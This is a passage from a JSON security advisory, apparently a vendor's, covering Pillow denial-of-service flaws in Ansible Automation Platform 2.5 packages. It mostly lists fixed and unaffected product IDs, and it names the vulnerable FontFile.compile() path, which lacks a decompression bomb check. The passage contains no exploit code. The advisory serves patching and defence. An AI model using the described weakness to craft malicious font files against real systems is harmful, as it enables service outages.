"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted PCF font data"
},
{
"cve": "CVE-2026-54060",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-06T20:02:29.509113+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497466"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library\u0027s font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Pillow prior to version 12.3.0. The FontFile.compile() method in PIL/FontFile.py assembles per-glyph images into a combined bitmap using Image.new() without calling Image._decompression_bomb_check(). This allows a specially crafted font file to trigger excessive memory allocation during conversion or saving, leading to denial of service via resource exhaustion.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
